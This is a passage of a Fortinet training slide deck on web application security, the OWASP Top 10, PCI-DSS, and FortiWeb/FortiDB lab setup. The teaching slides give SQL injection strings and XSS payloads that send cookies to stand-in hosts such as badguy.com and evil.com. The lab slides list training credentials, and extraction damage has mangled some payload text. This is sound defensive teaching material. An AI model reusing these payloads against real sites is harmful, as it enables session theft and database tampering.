latam mx fortiweb fortidb training-v1.1

7/27/2019 LATAM MX Fortiweb FortiDB Training-V1.1

1/362

LATAM SE TEAM

FortiWeb and FortiDB

Training


2/362

Introduction to Web Application Security1

Database Vulnerabilities & Miss Configurations2

Owasp Top 10 and PCI-DSS3

Lab Installation and Setup4

Introduction to FortiWeb5

How to PoC FortiWeb6

FortiWeb Basic & Advanced Troubleshooting7

Introduction to FortiDB7

How to PoC FortiDB8

FortiDB Basic & Advanced Troubleshooting9

AGENDA


3/362

Introduction to Web

Applications


4/362

Internet

What are Web Applications ?


5/362

What are Web Applications ?

What are web applications? Web applications are public and internet facing

applications

Accessed using a standard browser and providewebmail, online retail sales, online auctions,wikis and many other functions

They provide major e-commerce and business

driving tools for organizations

Web apps are written for efficient deliveryof content

In most cases web apps are notdeveloped with security in mind

Leaves apps open to exploit

Potential exposure of sensitive information

Attacks can range from simple defacementto identity theft, credit card and other PII theft

Web server data center

Database Servers

Front End Web Servers

Data Center Perimeter


6/362

Web Applications Advantages

A Standard Web Browser actsas the Application Client


7/362

Creates a virtual hyperspace Beyond geographical constraints

Break computer hardware and software obstacles

Bring the whole world together

A low cost way to Share, maintain, and distribute Information

Intranet

Electronic commerce

Customer support

Web Applications Advantages


8/362

Client (front end):

Presents an interface to the user

Gathers information from the user, submits it to a server, then

receives, formats, and presents the results returned from the

server

User needs a specific software to access data on the Server (anda Specific Operating System, etc.)

The client connects to the server using specific ports

So, what are Client / Server Applications ?


9/362

Server (back end): A database from which a client requests information

Fulfills a request for information by managing the request or

serving the requested information to the client

Responsible for data storage and management

Only allowed users can only retrieve data from server (Firewall

policies, access control, etc.)

So, what are Client / Server Applications ?


10/362

Adversaries have fewer obstacles when performing an attack

An infrastructure attack presents all the following obstacles:

A web application attack presents fewer obstacles and elements

Why those differences are important ?


11/362

HTTP is a networking protocol, foundation of the WorldWide Web.

HTTP functions as request/response protocol

HTTP defines nine methods

The methods GET and POST are the most widely used

GET Method: Requests a representation of the specifiedresource. Data is included in the URL requested:

GET http://www.xbank.com/get.html?uid=xxx HTTP/1.1

POST Method: Submits data to be processed to theidentified resource. Data is included in the message body

POST /login.php?username=User1&password=pass1 HTTP/1.1

Some Web Application Concepts


12/362

HTML documents are usually static But Web Applications need dynamic documents

Search results

Database access

Context sensitive reply

Client side / Server Side execution Server-side Action occurs at the server

Server runs a set of instructions and return values to the

browser Client-side Action occurs on the client side (browser)

The instructions are executed on users computer

Some Web Application Concepts


13/362

Client side scripts are embedded inside HTML document.They are interpreted by browser.

When Web browser encounters a script, it calls ascripting interpreter, which parses and deciphers thescripting code.

Provide response to questions and queries withoutinterventions from the server Validate user data

Calculate expressions

Link to other applications

Client Side Scripting


14/362

Goal:

Render and present content

to the user

Software:Browsers (IE, Safari, Firefox,

etc.)

Language:

HTML/JavaScript, etc.

Client Side / Application Layer


15/362

Allows creation of dynamic web pages Modifies HTML code on the server before sent to client

Uses databases such as Access and Oracle

Responds to user input

Server Side Scripting


16/362

Goal:Receive user requests,

validate, process and convert

them in database requests

Software:Web Servers (Apache/IIS),

Application Servers (Tomcat,

WebSphere)

Language:Java/ASP/PHP

Server Side / Application Layer


17/362

Goal:

Store and manage access

to data.

Software:DBMS (Oracle, MS SQL

Server, MySQL, etc)

Language:

SQL

Database / Data Layer


18/362

Input that requires validation HTTP parameters HTTP headers

Database/filesystem input

Configuration

Output that requires encoding HTML / CSS / Javascript / XML / Images

Common Web Application Problems


19/362

Web Application

Security


20/362

Are your Web Applications Secure ?


21/362

Injection attacks trick an application into includingunintended commands in the data send to aninterpreter.

Interpreters Interpret strings as commands.

Ex: SQL, LDAP, XPath

Key Idea

Input data from the application is executed as code by theinterpreter

SQL Injections


22/362

1. App sends form to user

2. Attacker submits form withSQL exploit data

3. Application builds string withexploit data

4. Application sends SQL queryto DB

5. DB executes query, includingexploit, sends data back toapplication

6. Application returns data touser.

Web Server

Attacker

DB Server

Firewall

User

Pass or 1=1--

Form

SQL Injections


23/362

Unauthorized Access Attempt:

password = or 1=1 --

SQL statement becomes:

select count(*) from users where username = userand password= or 1=1 --

Checks if password is empty OR 1=1, which is always true,

permitting access.

SQL Injection Attack # 1


24/362

Database Modification Attack:

password = foo; delete from tableusers

whereusernamelike%

DB executes twoSQL statements:select count(*) from users where username = userand

password = foo

delete from tableuserswhereusernamelike%

SQL Injection Attack # 2


25/362

Exploits of a MOM


26/362

Cross Site Scripting (XSS) is a type of exploit where informationfrom one context, where it is not trusted, can be inserted intoanother context, where it is

The trusted website is used to store, transport, or deliver maliciouscontent to the victim

The target is to trick the client browser to execute maliciousscripting commands

JavaScript, VBScript, ActiveX, HTML, or Flash

Caused by insufficient input validation

Cross Site Scripting


27/362

Steal cookies Hijack of users session

Unauthorized access

Modify content of the web page Inserting words or images

Misinform

Bad reputation

Spy on what you do

Network Mapping

XSS viruses

Cross Site Scripting can


28/362

Send e-mail with tags embedded in

the link.

Follows link and the script executes

1

2

http://mybank.com/

account.php?variable=>document.lo

cation=http://www.badguy.com/cgi-bin/

cookie.cgi%20+document.cookie

www.badguy.com

Cookie collector

Malicious content dose not get stored in the server

The server bounces the original input to the victim without modification

Cross Site Scripting - Reflected


29/362

Upload malicious scripting commands to

the public forum

Browse

Downlaod

maliciouscode

Public forum web site

Attacker

Victim

1

2 3

Great message!

var img=new Image();img.src=

"http://www.bad.com/CookieStealer/

Form1.aspx?s= "+document.cookie;

The server stores the malicious contentThe server serves the malicious content in its original form

Cross Site Scripting - Persistent


30/362

Cross-site request forgery, also known as a one-clickattack or session riding, is a type of malicious exploit of awebsite whereby unauthorized commands are transmittedfrom a user that the website trusts.

Unlike cross-site scripting (XSS), which exploits the trusta user has for a particular site, CSRF exploits the trustthat a site has in a user's browser.

Cross Site Request Forgery


31/362



32/362



33/362

Samy Kamkars JS worm from 2005 Payload

but most of all, Samy is my hero

Exponential growth

7 hours, ~200 infected 12 hours, ~10K infected

17 hours, >1M infected

MySpace shuts down

Case Study: MySpace Samy Worm


34/362

Encoded javascript inside Disguised as java script

Bypassed security using

eval(document.body.inne + rHTML)



35/362

MySpace implement blacklist Blacklist many tags, but not , , and some

others. So:

Blacklist the word javascript. So:

Blacklist innerHTML. document.body.innerHTML

gives page source. So:alert(eval('document.body.inne' + 'rHTML')



36/362

DATA

64% of 10M ofsecurity incidents hadport 80 as entrypoints

Some Reflections


37/362

Database Vulnerabilities and

Miss Configurations


38/362

What about the Database ?


39/362

RSA Proprietary information about RSA'sSecurID authentication tokens. (2011)

Sony -PlayStation Network customers

More than 100 million customer accountdetails and 12 million unencrypted credit

card numbers. (2011)

HBGary Federal

60,000 confidential emails, executivesocial media accounts, and customerinformation.(2011)

Epsilon

E-mail databases from 2 percent of thefirm's 2,500 corporate clients. (2011)

June 7, 2011RSA Faces Angry Users After BreachThe nations biggest banks and large technology companies like SAP rushedTuesday to accept RSA Securitys offer to replace their ubiquitous SecurID tokensas many computer security experts voiced frustration with the company.

Tue Apr 26, 2011Sony suffered a massive breach in its video game online network that led to the

theft of names, addresses and possibly credit card data belonging to 77 millionuser accounts in what is one of the largest-ever Internet security break-ins.

2011-03-01The embattled CEO of HBGary Federal has resigned his post three weeks afterAnonmyous hacked into the companys network and stole thousands of e-mailmessages.

April 02, 2011Major Breach at Epsilon, the World's Largest Permission Based Email MarketingServices Company, Affects Wide Range of Major Brands - List Continues to Grow

Database Heist
http://www.reuters.com/news/videohttp://www.reuters.com/news/video


40/362

Common DB Vulnerabilities / Miss Configurations

Default, blank, and weak username/password

Removing default, blank and weak log-in credentials is aimportant first step for filling chinks in your database armor.

The bad guys are keeping track of default accounts, and they'lluse them when they can.


41/362


Extensive user and group privileges

Privileges have not to be given to users who will eventually collectthem like janitors collect keys on their keychains.

Make users part of groups or roles and administering the rights

through those roles, which can be managed collectively moreeasily than if users were assigned direct rights.


42/362


Unnecessarily enabled database features

Database installation comes with add-on packages of all shapesand sizes that are mostly going to go unused by any oneorganization.

Database security is about reducing attack surfaces. Disable oruninstall those unused packages.


43/362


Broken configuration management

Databases have many different configuration choices andconsiderations available to DBAs to fine-tune performance andenhanced functionalities.

Unsafe configurations could be enabled by default or turned on forconvenience of DBAs or application developers.


44/362


Denial of Service / Buffer overflows

Buffer overflow are exploited by flooding input sources with farmore characters than an application was expecting (like adding100 characters into an input box asking for a SSN)

Database vendors have worked hard to fix the glitches that allowthese attacks to occur ( Thats why patching is so critical)


45/362

Vertical /Gov. Regulation(s) High level requirements for databases

Finance GLBA, Basel II Activity monitoring/Audit of customer records andaccount information residing in databases

Healthcare HIPAA Motoring/Auditing access to patient data residing indatabases

Pharma. CFR part 11 Motoring/Auditing access to drug research data in

databasesStates CA law 1386 Motoring/Auditing access to PID data residing in

databases(for privacy of personal information)

Federal FISMA(NIST 800-53A)

Assessment and Implement various IT internal controlsfor Databases

Cross industry

Regulation/

High level requirements for databases

PCI PID data access monitoring in databases

SOX Auditing Financial database transactions to ensure integrity of financialstatements

Regulatory Environment


46/362

Securing Confidential Data

Social Security, Credit Card, Revenue numbersall held in databases and applications (ERP,CRM, SCM, custom applications)

Automation of Auditing and Compliance

Reporting for SOX, PCI and other regulations

Change Control

Keep track of all changes related to databasestructures (DDL) and users (DCL)

Virtualization

Support both virtualized and non-virtualizedenvironments

Efficient Deployment and Management

Low TCO

DB Activity and Monitory Requirements


47/362

OWASP Top 10

2010


48/362

1. Injection

2. Cross site scripting (XSS)

3. Broken authentication and session management

4. Insecure direct object reference

5. Cross site request forgery (CSRF)

6. Security miss configuration

7. Insecure cryptographic storage

8. Failure to restrict URL access

9. Insufficient transport layer protection

10. Unvalidated redirects and forwards

OWASP Top 10 - 2010


49/362

Client Appl

DB

Shell

Pgm CPU

A1 - Injections


50/362

String query = "SELECT * FROM accnts WHERE ID='" +request.getParameter("id") +"'";

id="foo';DROP accnts;--"

SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';

id="foo"

SELECT * FROM accnts WHERE ID='foo';

A1 - Injections

A2 C Sit S i ti


51/362

Browser

Browser

Appl DB

A2 Cross Site Scripting

A2 C Sit S i ti


52/362

(String) page += "";

CC=123456789">window.location=http://evil.com?

x=document.cookie

CC=123456789"

A2 Cross Site Scripting

A3 B k A th ti ti


53/362

Unpredictable passwords, sessions-ID, security-questions

No sessions-id/credentials i URL

Avoid session-fixation

Time out of sessions & logout buttons

Different sessions id outside/inside TLS No clear text passwords

A3 Broken Authentication

A4 I Di t Obj t R f


54/362

2010q12011q2

period=2011q3

period=2011q2

A4 Insecure Direct Object Reference

A5 C Sit S i ti


55/362


56/362

Patching

OS Application

Frameworks / libraries

Disable unnecessary services

Stack traces Configuration

A6 Security Miss Configurations

A7 I C t hi St


57/362

Keep track on sensitive data

Password one-way-hashed & salted Password/Key management

TLS key pass phrase

M2M lsenord (obfuscation)

A7 Insecure Cryptographic Storage

A8 F il t t i t URL


58/362

/user/getAccounts

/admin/getAccounts

A8 Failure to restrict URL access

A9 Insufficient Transport Layer Protection


59/362

Use SSL/TLS

No mixed content Use secure cookies

Example FireSheep exploits poor solutions

A9 Insufficient Transport Layer Protection

A10 Unvalidated Redirects and Forwards


60/362

http://www.vuln.com/redir.asp?=http://www.links.com

http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D

A10 Unvalidated Redirects and Forwards


61/362

PCI-DSS Application

Security Requirements

Web Application Security and PCI


62/362

Requirement 6Develop and maintain secure systemsand applications Patching

Configuration

Development lifecycle

Testing

Production

Web Application Security and PCI

Sub requirement 6 3


63/362

Develop software applications based on industry best practices andincorporate information security throughout the software developmentlife cycle.

6.3.1 Testing of all security patches

6.3.2 Separate development, test, and production environments

6.3.3 Separation of duties between development, test, andproduction

6.3.4 Live PANs are not used for testing or development

6.3.5 Removal of test data and accounts before production

6.3.6 Removal of custom application accounts, usernames, and

passwords 6.3.7 Review of custom code prior to release to production or

customers

Sub-requirement 6.3

Sub requirement 6 3


64/362

Develop all web applications based on secure coding guidelinessuch as the Open Web Application Security Project (OWASP)

guidelines. Review custom application code to identify codingvulnerabilities.

6.5.1 Unvalidated input

6.5.2 Broken access control (for example, malicious use of user IDs) 6.5.3 Broken authentication and session management (use of

account credentials and session cookies)

6.5.4 Cross-site scripting (XSS) attacks

6.5.5 Buffer overflows 6.5.6 Injection flaws (for example, structured query language (SQL)

injection)

6.5.7 Improper error handling 6.5.8 Insecure storage

6.5.9 Denial of service

6.5.10 Insecure configuration management

Sub-requirement 6.3

Sub requirement 6 6


65/362

Ensure that all web-facing applications are protectedagainst known attacks by applying either of the followingmethods: Having all custom application code reviewed for common

vulnerabilities by an organization that specializes in application

security Installing an application layer firewall in front of web-facing

applications.

Sub-requirement 6.6

Sub requirement 6 6 Clarifications


66/362

Application Firewall

= Web Application Firewall (WAF)Not an application-layer firewall

What makes a WAF acceptable for PCI?

Meet all applicable PCI DSS requirements React appropriately to threats

Inspect web application input and respond

Prevent data leakage

Enforce both positive and negative security models

Inspect Hypertext Markup Language (HTML), Dynamic HTML

(DHTML), and Cascading Style Sheets (CSS)

Sub-requirement 6.6 - Clarifications


67/362

Initial Lab Configuration

Lab Topology


68/362

Vmnet 1 Host-OnlyNetwork

Host Machine:2.2.2.1/24

VM Database & FortiDBIP: 2.2.2.20/24

Windows XPAdministrator/fortidb1!$FortiDBadmin/fortidb1!$

VM Web Server:

IP: 2.2.2.21/24Ubuntu 10xuser/xuser

FortiWeb:

IP: 2.2.2.15/24FortiWeb-VMadmin/(blank password)

Lab Topology

Preparing the VM Environment


69/362

From the USBs provided by Fortinet, download thecompressed VMs: FWB_VM64bit

HTTP_Server

DB_Server

And the FortiDB Installer FDB_X86

You will need: VMWare: Workstation 7/8/9

RAM: 4096 Mb

Hard Disk: 20 Gb

Hyper Threading enabled

Preparing the VM Environment

Customize VMWare Environment


70/362

Edit Network Interfaces

VMnet1 (Host only):

2.2.2.0/24

Customize VMWare Environment

Virtual Machines Connections


71/362

Go to VM > Settings

Edit Network Adapter (1)

Point it to VMNET 1

Set the IP addresses asshown in the diagram

Windows DB Server

Ubuntu HTTP Server

FortiWeb

The Host Machine

Virtual Machines Connections

FortiWeb Initial Configuration


72/362

Press the Enter key once to get a new prompt, and log in using the

default FortiWeb-VM administrator name, admin.

No password for administrator, press Enter when prompted.

Use CLI to configure the

IP address of a virtual

interface (port1)config system interface

edit port1

set ip 2.2.2.15/24

End

FortiWeb Initial Configuration

Lab Flows


73/362

One-Arm HTTP Proxy Topology

Give us enough flexibility for ourLabs

SendTraffic through the FortiWeb



Windows XPAdministrator/fortidb1!$FortiDB 4.2.1admin/fortidb1!$

VM Web Server:


FortiWeb:

IP: 2.2.2.15/24FortiWeb-VM build0414admin/(blank password)

Lab Flows

Lab Flows


74/362

This f lat network deployment not

recommended in a product ion

environm ent since a cl ient can

easi ly b ypass Fort iWeb

One-Arm HTTP Proxy Topology

Give us enough flexibility for ourLabs

SendTraffic straight to theWeb Server



Windows XPAdministrator/fortidb1!$FortiDB 4.2.1admin/fortidb1!$

VM Web Server:


FortiWeb:

IP: 2.2.2.15/24FortiWeb-VM build0414admin/(blank password)

Lab Flows

Xbank Online Banking Application


75/362

Web Application:PHP/Apache

Database:MS SQL Server

Login URL:http://2.2.2.21/xbank/index.html

Login: hsimpson

Password: 1234

Xbank Online Banking Application

Xbank Navigation Flow


76/362

index.htmlRedirect toindex.php?p=login.html

index.phpFrameset

login.htmlLogin Page

topFrame.htmlTop Frame

bottomFrame.htmlBottom Frame

verify_admin.phpAuthenticate customer

list_accounts.phpList customersassociated accounts

list_cards.phpList customersassociated cards

show_profile.phpShow customerinformation

show_transaction.phpShow transferinformation

save_profile.phpSave changedcustomer information

list_activity.phpList account activity

save_transaction.phpMake transfer

Xbank Navigation Flow

Xbank Database Diagram


77/362

XBANK_CUSTOMERcustomer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_addresscustomer_since

XBANK_ACCOUNTaccount_idaccount_numberaccount_typeaccount_balanceaccount_currencycustomer_id

branch_id

XBANK_ACCOUNT_CARDaccount_id

card_id

XBANK_ACTIVITY

activity_idaccount_idactivity_timestampactivity_typeactivity_amountactivity_status

XBANK_BRANCHbranch_idbranch_namebranch_address

XBANK_CARDcard_idcard_numbercard_type

card_cvdcard_expiration

Xbank Database Diagram

FortiWeb Servers Configuration


78/362

Physical Server: This is the real HTTPserver (real IP address)

Virtual Server: This represent theHTTP server as its seen by external

network devices (similar to a Virtual IP)

Protected Server: Represents all IPaddresses, hostnames, or FQDN thatmight come in the Host field of theHTTP header




79/362

A note about Protected Servers!

Its important in multi-homed

scenarios: Same Virtual IP

Same Physical IP Protected hosts allow to define different

policies for different sites.

Be careful with NATed environments

When accessed by IP address Host field value wont be the same as the

Virtual IP address


Physical Server Setup


80/362

1. Create a new PhysicalServer Object

2. Unique object name

3. Physical IP Address

ys ca Se e Setup

Virtual Server Setup


81/362

3. Virtual IP address

1. Create a new VirtualServer Object

2. Unique Object Name

4. Listening Interface

p

Protected Servers Setup


82/362

1. Define ProtectedServers

3. Default Action = Deny

4.Click OK to save

5. After saving click Create New

2. Unique Object Name

p

Protected Servers Setup (2)


83/362

2. Accept HTTP Traffic with hostname

3. Click OK to save

1. Hostname used by client

p ( )

Protected Servers Setup (3)


84/362

Final Results

p ( )

Create a Web Policy


85/362

1. Select Server Policy

2. Click Create New tocreate a new Server Policy

y

Create a Web Policy (2)


86/362

Policies are the glue thatjoin Physical Servers,Virtual Servers,Protected Hosts andProtection Profiles.

What are we protecting

and how

1. Complete your policy asdefined in the left image

2. Leave other fields asdefault

3. Click OK to save

y ( )

Checking the Configuration


87/362

1. Enter virtual IP and URL path to testHTTP Proxy Settings

g g

Checking the Configuration


88/362

1. After accessing the XBANK application, check yourARP table

Windows: run arpa in a command window

Linux/Mac: run arpan in a terminal

2. Note the MAC addresses for the IP address of

your FortiWeb and your Virtual IP. Are the same?,why?

g g

Access using FQDN


89/362

1. Add an entry to your hosts table so

www.xbank.com is resolved with 2.2.2.50 (VirtualIP)

Windows: %WINDIR%\System32\drivers\etc\hosts

Linux\Mac: /etc/hosts

2. Ping www.xbank.com. Does it work?3. Access www.xbank.com using your browser. Does

it work?. Why?

4. Add a new entry in your protected server to accept

requests to www.xbank.com

Final Results
http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/http://www.xbank.com/


90/362

Final Results

FortiDB Installation (1)


91/362

Login to the your virtual machine with an administrator

account

Execute FortiDB installer and follow on screen

instructions



92/362



93/362

Select installation path or leave default: C:\FortiDB



94/362

Select FortiDB internal repository. Use Derby in this case



95/362

Leave communication ports by default



96/362



97/362



98/362



99/362



100/362

Verify installation by logging in to FortiDB:

URL: http://2.2.2.20:9100/ UID: admin

PWD: fortidb1!$

FortiDB Initial Setup
http://2.2.2.20:9100/http://2.2.2.20:9100/


101/362

FortiDB Initial SetupLAB

admin

fortidb1!$

Monitoring xbankapp_db


102/362

1. Navigate toTargets

2. Click Add

to specify a new

DB Target

Monitoring xbankapp_db (2)


103/362

1. Fill requiredinformationaccording tothe values inthe figure

4. Test Connection 3. Save

2. Completecredentials

(sa/fortidb1!$)

5. Validate test result



104/362

1. Navigate toMonitoring Management

2. Click on the database target



105/362

2. Specify Trace Folder location

5. SavePath to Trace Folder:C:\Program Files\Microsoft SQL Server\MSSQL10.XTREME_DB\MSSQL\Log

3. Test

4. Validate Test Result

1. SelectCollection Method



106/362

1. Go to Alert Policy Groups (Double Click)

2. Select Monitoring

Policy Groups

3. Save



107/362

2. Click check box to enable all policies

1. Go to Alert Policies tab (Double Click)

3. Click Enable to save



108/362

1. Navigate to General Tab

2. Select Start monitoring when FortiDB starts& Click the Start Monitoring Button

3. Save

Monitoring check


109/362

1. Navigate back to Monitoring Management

3.You should end up with a greenmonitoring status indicator


110/362

Introduction to

FortiWeb

What is Application Security ?


111/362

Application life-cycle focus: (Mitigatingcontrol)

Design Development

Deployment

Upgrade

Maintenance

Ideal but too late

Difficult

Lengthy

Expensive

Legacy apps?

Who has responsibility?

Proprietary Software

Off the Shelf

Cloud Offering Application controls focus:

(Compensating Control)

Mitigation of threats (technical / functional)

Web applications security policy

Application Security Needs New Approach


112/362

Network Firewall

IPS/Deep PacketInspection Firewalls

FortiWebWeb Application Firewall

Network firewalls detect network

attacks Inspect IP and port

IPS products detect knownsignatures only Signature evasion is possible

No protection of SSL traffic

No real HTTP understanding (headers,parameters, etc)

No application awareness

No user awareness

High rate of false positives

Only Web Application

Firewalls can detect andblock applicationattacks!

Network layer(OSI 1-3)

Application layer(OSI 4-7)

Introducing - FortiWeb Web Application Firewall


113/362

Web Application Firewall- WAFSecures web applications to help customers meet compliance requirements

Secures WebApplications

Scans and DetectsWeb Vulnerabilities

Optimizes ApplicationDelivery

Web Vulnerability ScannerScans, analyzes and detects web application vulnerabilities

Application DeliveryAssures availability and accelerates performance of critical web applications

WAF

FortiGuard Subscription Services


114/362

1

100+ threat research professionals

Eight global locations

Automated updates to Fortinet customers

FortiWeb Security Service subscription keeps yourFortiWeb automatically up to date with:

Hundreds of application signatures

Updates with new application signatures, Maliciousrobots, suspicious URL patterns and webvulnerability scanner patterns

FortiWeb Antivirus Service subscription automated

content updates for file upload scanning

Robust 24 x 7 x 365 Real-Time Global Intelligence

Real-Time Security Protection Global Distributed Network

FortiWeb Flexible Deployment Options


115/362

Layer II - Transparent Inspection and True

Transparent Proxy Easy deployment - No need to re-architect

network, full transparency

Fail Open Interface

Reverse Proxy Supports content modification for both

requests and replies from the server Advanced URL rewriting capabilities

HTTPS offloading

Enhanced load balancing schemes

Non Inline Deployment SPAN port Zero network latency

Blocking capabilities using TCP resets Ideal for initial product evaluations, non-

intrusive network deployment

Web Application

Servers

FortiWeb

FortiWeb

High Availability


116/362

Active / Passive failover Full configuration

synchronization

Seamless fail-over

No down time

Configuration Sync Sync FortiWeb devices

across networks

Allows managing policiesacross multiple devicesfrom a central location

Seamless integration intoalready existing HA/LBenvironments

Server FarFortiWeb

Disaster Recovery

FortiWeb Product Family


117/362

Large Enterprise Deployments ASIC based Acceleration - FortiModule-CP7 500 Mbps HTTP throughput 27,000 transactions per second

Large Enterprise/ Service Provider Deployments ASIC based Acceleration - FortiModule-CP7 1 Gbps HTTP throughput 40,000 transactions per second Hot-swap redundant AC-Power, 2*1 TB storage 6 x 10/100/1000 copper (+ 2x Gbps SFP for 3000CFsx)

Mid-Enterprise Deployments 100 Mbps HTTP throughput

10,000 transactions per secondFortiWeb-400C

FortiWeb-1000C

FortiWeb-3000C/3000CFsx

FortiWeb-4000C

Large Enterprise/ Service Provider Deployments

ASIC based Acceleration - FortiModule-CP7 Hardware based DLP acceleration 2 Gbps HTTP throughput 70,000 transactions per second Hot-swap redundant AC-Power, 2*1 TB storage 6 x 10/100/1000 copper, 2x Gbps SFP interfaces

FortiWeb-VM


118/362

Desktops /Private

Servers / DMZ FortiWebVirtual

Appliance

Virtualized Data Center

Public ZoneDMZ

Deploy FortiWeb in a virtualizedenvironment

Mitigates blind spots Protects web applications regardless of

connection origin

Provides visibility to internal connections as well

Same functionality as appliance

Requirement Min needed forFortiWeb-VM

Licenses 2-vCPU, 4-vCPU, 8-vCPU

Hypervisor VMware ESXi/ESX3.5/4.0/4.1/5.0

Memory Min. 1024

CPU Min. 2 virtual CPUs

10/100/1000 Interfaces Min. 2 Max. 4virtual NICs

Storage Capacity Min. 40G

Real Time Dashboard


119/362

FortiWeb provides a real timedashboard

Traffic monitor per application

Attack Event history per

application Latest Alerts

Appliance state

Data Analytics Geo IP Analysis & Security


120/362

Analyses web app usage based

on geographic location and serveraccess

Dissect traffic based on Hit, Dataand Attack type

Easily block access from a country

using right click Map view or List view

Provides a graphical interface thathelps organizations understandapplication trends both from a userand server perspective

FortiAnalyzer Integration


121/362

Centralized logging, reportingand analysis for multipleFortiWeb devices

* Start ing From Fort iAnalyzer MR3

Acceleration


122/362

Integrated ASIC based hardware

SSL offloading offload CPU intensiveSSL computing from server to FortiWeb Hardware-based key exchange and bulk

encryption

Purpose built SSL processing

Full certificate management

Advanced certification verification and revocationcapabilities

TCP Connection Multiplexing

FortiWeb

Data Compression


123/362

Compress poorly optimised contentto minimise impact on networkresources and reduce applicationdelivery latency

Allows efficient bandwidthutilization and response time tousers by compressing data

retrieved from servers Compresses files using gzip

Compression rate depends on datatype and character redundancy

FortiWeb

Load Balancing


124/362

Intelligent, application aware layer 7 load balancing

Support for HTTP/HTTPS only

Variety of Load Balancing algorithms Round Robin

Weighted Round Robin

Least Connection

HTTP Session Based Round Robin

Connection persistence Persistence timeout value

Flexible health checks Physical Server monitoring via HTTPS, HTTP, TCP, Ping

Content based health checks with regex support

Web Services balancing WSDL or Content routing statements

Advanced Rewriting Capabilities


125/362

Content Routing - route

traffic based on: IP

Host

URL

Rewriting and

Redirection capabilities Host

URL

Referrers

Rewrite reply content Absolute links

Any required content

Multiple content types

supported

Web Application Scanner


126/362

Easily scan yourapplications for webvulnerabilities Common vulnerabilities

SQL Injection

Cross Site Scripting

Source code disclosure OS Commanding

Enhanced/Basic Mode Authentication options Granular crawling capabilities

Schedule and on demandscanning

FortiWeb

Web Application Scanner


127/362

Vulnerability Reports

Scan summary Vulnerability by severity

Vulnerability by categories

Application Vulnerabilities

Common Vulnerabilities

Server Information Crawling information

URLs accepting input

External Links

Email reports automatically

Updates via FortiGuard Complements WAF for PCI DSS

6.6

FortiWeb Auto Learn


128/362

Understands Application Structure

Models elements from actual traffic

Builds baseline based on URLs, parameters,

HTTP methods

Automatically Understands Real behavior

Can form fields/parameters be modified by users?

What are the length and type of each form field?

What characters are acceptable (min, max, average)?

Is a form field required or optional?

Provides recommendations and graphs

What about those web app dedicated DDoS attacks?


129/362

Application based DDoS is on the increaseaccounting for a quarter of all DDoS attacks

Under the radars bandwidth threshold

Targeting specific web app/protocol flawsrather than bandwidth consumption

CPU intensive SQL queries to backend DB

Writing to hard disks

Server specific

Slow based and legitimate request attacks

Slowloris - Sends legitimate, but partial, never ending requests

Using tools that can be easily downloaded from the internetsuch as HOIC and LOIC

Using botnets and automatic tools to reach mass

Sometimes camouflaging real data breach attempts

SQL Injection primarily Zombie BotnetMany become one

FortiWeb DoS/DDoS ProtectionApplication and Network Based


130/362

Analyzes requests originating from different usersbased on different characteristics such as IP and cookie

Sophisticated mechanism understands whether theseare real users or automated attacks (HOIC, LOIC tools)

Application layer 4 different policies HTTP Access Limit - Limits the amount of HTTP requests per second from a

certain IP

Malicious IPs - Limits the number of TCP connections with the same sessioncookie

HTTP Flood Prevention -Limits the number of HTTP requests per second withthe same session cookie

Real Browser Enforcement - Sets the number of HTTP requests perTCP connection, per second, to a specific URL before FortiWeb issues a script tothe client to validate whether this is a real browser or an automated tool

Network layer 2 different policies TCP Flood Prevention - Limits the number of TCP connections from the

same source IP address

SYN Cookie Protects against SYN flood attacks

Antivirus File Scanning and File UploadRestriction


131/362

Scan file uploads usingFortinets Antivirus engine

Regular and extended virusdatabase

Updates via FortiGuard withAntivirus service

Restricts file type uploads

Data Leak Prevention


132/362

FortiWeb monitors alloutgoing traffic and protectsagainst:

Information Disclosure

Credit Card theft/misuse

Web Site Anti-Defacement WAF


133/362

Monitors application files atspecified time intervals

Upon file change detectionFortiWeb Alert

Automatically restore

FortiWeb provides protection at all layers


134/362

Advanced Protection Custom Security Policies

Custom policies to match on multiple elements URL, Source IP, Header type and value, Thresholds

Antivirus file upload scanning and Data Leak Prevention Scans uploaded files for viruses and malware (FortiGuard updates)

Detects Information Disclosure, credit card and PII leakage

Auto Learn and Validation Rules Deviations from normal user behavior, automated and customer rules

Application Attack Signatures Detects known application attacks

FortiGuard updates

Protocol Validation Validates HTTP RFC compliance

Application and Network Denial of Service Protection (DoS/DDos protection)

Detects and aggregates DoS attacks from multiple vectors

Event/Attack/Traffic Alerts


135/362

Attack Alerts

Full HTTP request

Traffic Alerts Any access to web

applications

Event Alerts Any action on

FortiWeb device

Reports - Attacks


136/362

Out of the box rich andgraphical reports

Custom reports

Scheduled daily,

weekly, Monthly oron demand

PDF, HTML, Word, TXT,MHT formats

Reports Traffic and Events


137/362

Report on any access tothe application Application Hits

Service type

usage (HTTP/HTTPS)

Top sources

Report on any accessor change to theFortiWeb device

FortiWeb Value Add


138/362

FortiClient Desktop

Application Security

Application Delivery

Vulnerability Assessment

Authentication Load Balancing andAcceleration

HTTP Compliance Application Signatures Auto Learn Data Leak Prevention

Compression

Dramatically reduce the risk of corporatedata loss.

Accurate protection with multiple layers ofdefense

Integrated Web Vulnerability Scanner

Protects against the OWASP Top 10

Automated management using AutoLearn Baselining

Easily deploys in any environment Multiple deployment options

Accelerates applications Application aware Load Balancing Compression ASIC based SSL Acceleration

Helps achieve PCI compliance


139/362

Hands On

How to PoC FortiWeb

Web Protection Profiles


140/362

Web Protection Profiles

Define what to inspect and how to do it.

Are made of different rules, constraints and settings

Are similar to Protection Profiles in the FortiGate

configuration

Creating a new Web Protection Profile


141/362

1. Select: Web Protection ProfilesInline Protection Profile

2. Click Create New

Creating a new Web Protection Profile (2)


142/362

1. Name the Web

Protection Profile:xbank_web_protection

2. Leave other fields asdefault

3. Click OK to save

4. Edit thexbank_web_policyandassign the newly created

profile5. Test accessing the

XBANK application

FortiWeb URL Rewriting


143/362

FortiWeb URL RewritingDiscussion

URL Rewriting


144/362

Without URL rewriting when accessing the XBANK application

the end user(s) are required to specify /xbank/ in the URLpath, due to the existing directory structure.

The URL Rewriting feature removes this requirement.

Added Benefit: Transparently hides the internal directory

structure from end user(s)URL entered by end user(s) changes

From:

To:

URL Rewriting > Creating Rewriting Rules


145/362

1. Create a New URLRewriting Rule

2. Click Create New

